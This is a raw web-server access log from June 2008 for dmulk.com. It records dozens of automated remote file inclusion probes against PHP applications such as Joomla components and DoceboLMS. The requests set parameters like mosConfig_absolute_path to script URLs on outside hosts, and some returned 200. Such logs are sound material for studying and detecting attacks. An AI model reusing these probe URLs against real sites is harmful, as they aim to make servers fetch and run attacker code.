62.75.204.30 - - [25/Jun/2008:11:20:50 -0700] "GET /index.php?pag=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18457 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:11:20:51 -0700] "GET /logs/index.php?pag=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:20:53 -0700] "GET /logs//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:20:53 -0700] "GET //doceboLms//class/class.dashboard_lms.php?where_framework=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:20:55 -0700] "GET /logs/access_080218.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:21:02 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:21:02 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:21:02 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:11:21:02 -0700] "GET /logs/access_080127.log//modules/TotalCalendar/about.php?inc_dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.204.99.201 - - [25/Jun/2008:11:21:05 -0700] "GET /logs/access_080220.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.99.201 - - [25/Jun/2008:11:21:06 -0700] "GET /errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.99.201 - - [25/Jun/2008:11:21:06 -0700] "GET /logs/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:11:21:09 -0700] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_unregister&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.99.201 - - [25/Jun/2008:11:21:10 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:21:10 -0700] "GET /logs/access_080312.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:21:11 -0700] "GET /administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:21:11 -0700] "GET /logs/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:11:21:14 -0700] "GET /logs/access_080103.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_unregister&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:11:21:19 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:11:21:19 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:21:21 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:11:21:26 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:11:21:26 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:11:21:27 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:21:27 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:11:21:27 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:21:32 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:21:32 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:11:21:46 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:11:21:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:21:53 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:21:58 -0700] "GET /logs/access_080213.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:22:15 -0700] "GET /logs/access_080211.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:22:16 -0700] "GET //doceboLms//class/class.dashboard_lms.php?where_framework=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:22:16 -0700] "GET /logs//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:22:20 -0700] "GET /logs/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:22:26 -0700] "GET /logs/module_db.php?pivot_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:22:26 -0700] "GET /module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:22:31 -0700] "GET /module_db.php?pivot_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:22:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:22:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:22:36 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:22:37 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:22:37 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:22:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:22:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.179.16 - - [25/Jun/2008:11:23:02 -0700] "GET /logs/access_080213.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [25/Jun/2008:11:23:02 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [25/Jun/2008:11:23:03 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [25/Jun/2008:11:23:04 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:23:06 -0700] "GET /logs/access.log/index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:23:07 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:23:07 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:23:08 -0700] "GET /index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 18417 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:23:08 -0700] "GET /logs/index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:11:23:10 -0700] "GET /logs/access_080118.log/index.php?pag=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.67.20.173 - - [25/Jun/2008:11:23:35 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://hate.tao21.de//files/files/contrm.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.67.20.173 - - [25/Jun/2008:11:23:36 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://hate.tao21.de//files/files/contrm.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:11:23:51 -0700] "GET /logs/access_080127.log/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:11:23:51 -0700] "GET /logs/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.51.180 - - [25/Jun/2008:11:24:00 -0700] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/feed/ HTTP/1.0" 200 657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.12.53.176 - - [25/Jun/2008:11:24:21 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:11:24:21 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:11:24:33 -0700] "GET /logs/access_080211.log/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:11:24:58 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:11:24:58 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:25:16 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:25:17 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:25:17 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:11:25:27 -0700] "GET //main.php?p=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:11:25:29 -0700] "GET /errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:25:59 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:26:00 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:26:00 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:26:10 -0700] "GET /logs/access_080215.log/joomla/index.php?option=com_restaurante&task=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:26:13 -0700] "GET /logs/access_080212.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:26:17 -0700] "GET /logs/access_080127.log/scanhttp://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:26:20 -0700] "GET /scanhttp://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:26:22 -0700] "GET /logs/scanhttp://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:11:26:26 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:11:26:27 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:11:26:27 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:11:26:39 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:11:26:41 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18583 "-" "libwww-perl/5.810" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:26:45 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:26:45 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:11:26:48 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:11:26:49 -0700] "GET /logs/index.php?option=com_creation3d&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:11:26:50 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 200 18515 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:11:26:54 -0700] "GET /logs/access_080122.log/index.php?option=com_creation3d&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:11:26:57 -0700] "GET /index.php?option=com_creation3d&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 200 18481 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:26:57 -0700] "GET /logs/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:26:58 -0700] "GET /mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:11:27:22 -0700] "GET /logs/access_080418.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:27:24 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:27:25 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:27:25 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.posaelditaqui.com/DjViRuS/sex???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:11:27:41 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:11:27:44 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 200 18515 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:28:05 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:28:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:28:14 -0700] "GET /logs/access_080215.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:28:16 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:28:19 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:11:28:40 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:11:28:40 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:11:28:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:28:42 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:28:42 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:28:51 -0700] "GET /logs/access_080215.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:11:28:54 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.dutadewata.com/bot4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:11:28:54 -0700] "GET /config.php?path_to_root=http://www.dutadewata.com/bot4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:11:28:54 -0700] "GET /logs/config.php?path_to_root=http://www.dutadewata.com/bot4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
